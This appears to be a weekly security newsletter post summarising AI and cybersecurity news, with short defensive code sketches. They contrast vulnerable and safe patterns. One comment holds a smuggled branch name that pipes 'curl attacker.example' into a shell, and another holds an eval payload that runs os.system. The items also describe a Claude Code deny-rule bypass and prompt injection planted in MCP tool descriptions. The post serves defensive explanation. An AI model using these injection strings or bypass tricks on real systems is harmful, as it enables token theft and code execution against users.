Claude Code Security Bypass, LinkedIn is Watching your Browser, OpenAI Codex Token Theft | AI & Cybersecurity Last Week
Covering 3/30/26 - 4/5/26. Secret message at the end.
Hi, I’m Jasmine — a Product Security Engineer, and if you know me personally, also quite a bit of a travel bug and matcha enthusiast. I’ve realized how hard it is to keep up with everything happening in cybersecurity, AI, and tech because there’s just so much being put out every day. So every week I share the security-related news and stories I found most interesting or relatable. It helps me stay accountable, and hopefully it helps you stay in the loop too :)
AI Research & Vulnerabilities
Claude Code Silently Stops Enforcing Security Rules After 50 Commands: Claude Code silently ignores user-configured security deny rules when a command contains more than 50 subcommands. A developer who configures a rule to never run `rm` will see it blocked when run alone, but the same command runs without restriction if preceded by 50 harmless statements, and the security policy silently vanishes. A fix reportedly exists in Anthropic's codebase but was never shipped.
A Malicious Git Branch Name Was All It Took to Steal GitHub Tokens From OpenAI Codex:
A critical command injection vulnerability in OpenAI's Codex cloud environment allowed attackers to steal GitHub OAuth tokens by injecting shell commands through a branch name parameter. The flaw affected every Codex surface, including the ChatGPT website, Codex CLI, SDK, and IDE extension, because the container setup process embedded a live GitHub OAuth token in the git remote URL and passed unsanitized branch names directly to shell commands during checkout. OpenAI classified it as Critical Priority 1 and remediated all issues by February 5, 2026.
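The report doesn't publish the vulnerable code, but the bug class is easy to sketch. Below is a minimal, hypothetical illustration (the function names are mine, not Codex's) of the difference between splicing an attacker-controlled branch name into a shell string and passing it as a plain argument vector:

```python
def checkout_unsafe(branch: str) -> str:
    # VULNERABLE pattern: an attacker-controlled branch name is spliced
    # into a shell command string, so a branch named
    # "main; curl attacker.example | sh" smuggles in a second command
    # that runs with whatever credentials the environment holds (here,
    # the live OAuth token embedded in the git remote URL).
    return f"git checkout {branch}"  # imagined as later run with shell=True

def checkout_safe(branch: str) -> list[str]:
    # Safer pattern: pass the branch as a single argv element with no
    # shell involved, and add "--" so the value can't be parsed as an
    # option flag either.
    return ["git", "checkout", "--", branch]

malicious = "main; echo pwned"
assert "; echo pwned" in checkout_unsafe(malicious)  # payload became shell syntax
assert checkout_safe(malicious)[-1] == malicious     # payload stayed inert data
```

The fix is rarely "sanitize harder" — it's refusing to hand untrusted strings to a shell at all.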
96% of Security Flaws Found in Popular MCP Servers Were Confirmed Exploitable at Runtime:
Runtime testing of six high-profile MCP servers with a combined 68,000+ GitHub stars confirmed 27 out of 28 critical and high severity findings as exploitable, a 96.4% confirmation rate. The vulnerabilities included shell command injection via unsanitized inputs, arbitrary Python code execution through exec(), unauthenticated WebSocket bridges, and covert prompt injection instructions deliberately embedded in tool descriptions to silently profile users. One MCP server for Figma with 71,000 monthly npm downloads had 18 findings alone including six critical issues where any process on the same machine could connect to the WebSocket bridge, impersonate a plugin, and inject messages into the AI context.
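The exec()/eval finding is a classic anti-pattern in tool handlers. Here's a minimal, hypothetical sketch (the tool name is invented, not from any of the audited servers) of evaluating tool input directly versus treating it as data:

```python
import ast

def calc_tool_unsafe(expression: str):
    # VULNERABLE pattern reported in several MCP servers: tool input is
    # handed straight to eval()/exec(), so a prompt-injected "expression"
    # like "__import__('os').system('id')" executes arbitrary code on
    # the host running the server.
    return eval(expression)  # shown only as the anti-pattern

def calc_tool_safe(expression: str):
    # Safer: ast.literal_eval accepts only Python literals (numbers,
    # strings, tuples, lists, dicts) and raises on anything that could
    # have side effects, such as calls or attribute access.
    return ast.literal_eval(expression)

assert calc_tool_safe("(1, 2, 3)") == (1, 2, 3)
try:
    calc_tool_safe("__import__('os').system('id')")
except ValueError:
    pass  # rejected instead of executed
```

For anything richer than literals, a real parser or an allowlisted operation set beats trying to sandbox eval.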
Study Finds AI Is Getting Better at Work Tasks Broadly, but Full Automation Is Still Far Off:
A research paper analyzing over 17,000 worker evaluations across more than 3,000 job tasks found that AI capabilities are improving broadly across many types of work at once rather than in sudden bursts concentrated on specific tasks, a pattern the researchers call rising-tide automation. Models completed tasks that take humans 3-4 hours at about a 50% success rate in 2024 Q2, rising to roughly 65% by 2025 Q3. The researchers caution that real-world automation remains far more difficult than task-level benchmarks suggest due to integration costs, regulatory constraints, and the gap between completing individual tasks and replacing full occupations.
AI News
Anthropic Is Cutting Off Third-Party Tool Access From Claude Subscriptions: Anthropic announced that Claude subscriptions will no longer cover usage on third-party tools like OpenClaw, citing that subscriptions were not built for the usage patterns these tools generate and that the company is prioritizing capacity for customers using its own products and API. Users can still access third-party tools through their Claude login using discounted usage bundles or a Claude API key, and existing subscribers will receive a one-time credit equal to their monthly plan cost.
California Signs Executive Order Requiring AI Companies to Meet Safety Standards:
Governor Gavin Newsom signed an executive order directing California to develop new state contracting processes that vet AI companies based on how they attest to and explain their policies around protecting the public from exploitation of illegal content, biased models, deepfakes, privacy violations, and cybersecurity risks. The order also directs the state to expand its responsible use of AI across government operations while partnering with companies like Nvidia, Google, Adobe, IBM, and Microsoft to expand AI training access for over two million students and faculty across California public schools and universities.
Anthropic Signs AI Safety Agreement With Australia:
Anthropic signed a Memorandum of Understanding (MOU) with the Australian government to cooperate on AI safety research and support Australia's National AI Plan. The MOU includes a commitment to work with Australia's AI Safety Institute on sharing findings about emerging model capabilities and risks, joint safety evaluations, and academic research collaborations. Anthropic also announced AUD$3 million in partnerships with Australian research institutions to use Claude for disease diagnosis and treatment and to support computer science education.
Cybersecurity Research & Vulnerabilities
Device Code Phishing Attacks Have Surged 37x This Year and They Bypass MFA and Passkeys:
Device code phishing, which abuses the OAuth 2.0 Device Authorization Grant to steal access tokens while bypassing passwords, MFA, and even passkeys, has seen a 37.5x increase in detected phishing pages in 2026 so far. The technique tricks users into issuing access tokens for attacker-controlled applications, with Microsoft being the most heavily targeted platform at scale followed by Google, Salesforce, GitHub, and AWS. The most prominent phishing kit driving the surge is tracked as EvilTokens, which uses a Cloudflare Workers frontend and Railway backend and has been evolving rapidly since January 2026.
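To see why this bypasses MFA and passkeys, it helps to look at the message shapes of the Device Authorization Grant (RFC 8628) itself. The sketch below only builds the request payloads, sending nothing: the key point is that the victim completes MFA legitimately on the vendor's real login page, while the token lands at whichever device started the flow. Endpoint URLs match Microsoft's published identity platform docs; the client_id is a placeholder.

```python
DEVICE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/devicecode"
TOKEN_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/token"

def device_code_request(client_id: str) -> dict:
    # Step 1 (runs on the attacker's machine in a phishing scenario):
    # request a device_code / user_code pair for a chosen scope.
    return {"client_id": client_id, "scope": "user.read offline_access"}

def token_poll_request(client_id: str, device_code: str) -> dict:
    # Step 3 (also the attacker's machine): poll the token endpoint
    # while the phished victim types the user_code into the *genuine*
    # vendor login page and approves sign-in, MFA and all. The access
    # token is then issued to the polling device, not the victim's.
    return {
        "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
        "client_id": client_id,
        "device_code": device_code,
    }

req = token_poll_request("00000000-0000-0000-0000-000000000000", "ABC123")
assert req["grant_type"].endswith("device_code")
```

Defensively, that's why policies restricting which apps and networks may use the device code grant matter more here than adding user-facing MFA prompts.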
36 Malicious npm Packages Were Uploaded in Real Time to Backdoor Strapi Servers:
36 malicious npm packages disguised as Strapi CMS plugins were published across four sock-puppet accounts, carrying eight distinct payload variants including Redis remote code execution, database credential theft, reverse shells, and a persistent command-and-control agent. The payloads evolved in real time across publications, shifting from direct exploitation attempts to reconnaissance and full C2 implants, with specific targeting of a Guardarian API integration module confirming the attacker had prior knowledge of the intended victim. The campaign also attempted raw disk reads to bypass filesystem permissions entirely, SSH key injection for persistent access, and PostgreSQL connection string hunting across the target environment.
Hackers Are Mass-Exploiting a Next.js Vulnerability to Harvest Credentials From Hundreds of Servers:
A large-scale automated credential harvesting campaign tracked as UAT-10608 is exploiting Next.js applications vulnerable to React2Shell (CVE-2025-55182) to gain initial access and deploy a multi-phase collection framework called NEXUS Listener. The operation has compromised at least 766 hosts across multiple geographic regions and cloud providers, harvesting credentials, SSH keys, cloud tokens, and environment secrets at scale. The targeting pattern is consistent with automated scanning using services like Shodan or Censys to enumerate publicly reachable Next.js deployments and probe them for the vulnerability.
Cybersecurity News
FBI Warns That Popular Chinese-Made Apps Can Collect Data Across Your Entire Phone:
The FBI issued a public service announcement warning that many of the most downloaded apps in the United States are developed by companies based in China and are subject to Chinese national security laws that could enable the government to access user data. The agency warns that when users grant permissions to these apps, they can persistently collect data and private information throughout the entire device, not just within the app or while it is active. The FBI recommends reviewing app permissions, limiting access to sensitive data like location and contacts, and removing apps that request unnecessary access.
Fake Traffic Violation Texts With QR Codes Are Targeting People Across the U.S.:
Scammers are sending fake Notice of Default traffic violation text messages impersonating state courts across the U.S., pressuring recipients to scan a QR code that leads to a phishing site demanding a $6.99 payment while stealing personal and financial information. The campaign has been reported across multiple states including New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey. Unlike previous toll violation scams that included direct links, this variation attaches an image of an alleged court notice with an embedded QR code to bypass text-based URL filtering.
$286 Million Drift Protocol Hack on Solana:
Drift Protocol, the largest decentralized perpetual futures exchange on Solana, was exploited for $286 million on April 1, 2026, with on-chain behavior, laundering methodologies, and network-level indicators consistent with techniques observed in previous DPRK-attributed operations. If confirmed, this would be the eighteenth DPRK-linked incident tracked this year with over $300 million stolen so far, continuing a sustained campaign of large-scale crypto theft that the US government has linked to the funding of North Korea's weapons programs.
LinkedIn Is Secretly Scanning Your Browser for Over 6,000 Chrome Extensions: LinkedIn injects hidden JavaScript into user sessions that checks for over 6,000 browser extensions and links the results to identifiable user profiles tied to real names, employers, and job roles. The scanning includes over 200 products that directly compete with LinkedIn's own sales tools like Apollo, Lusha, and ZoomInfo, allowing the platform to map which companies use which competitor products by cross-referencing extension data with employer information. LinkedIn claims the report stems from a dispute with the developer of a restricted browser extension called Teamfluence and argues it is an attempt to re-litigate that dispute publicly.
Fraudsters Are Using Vacant Homes and USPS Tools to Steal Your Mail and Identity:
A tutorial shared in a fraud-focused chat group outlines a step-by-step method for identifying vacant residential properties and exploiting them to intercept sensitive mail for identity theft and financial fraud. The approach combines open-source intelligence to find empty homes, USPS Informed Delivery to monitor incoming mail remotely, and mail forwarding services set up with fake identities to redirect deliveries to attacker-controlled locations. Once forwarding is in place, attackers no longer need to visit the physical property, giving them persistent access to sensitive documents like bank statements and credit cards while reducing their exposure.
Go touch grass.
👉 Like this post + subscribe to catch next week’s roundup!


Hi! Want to say your posts are amazing and what you do is truly beneficial and keep up the great work! Keep being you you got this! 🙂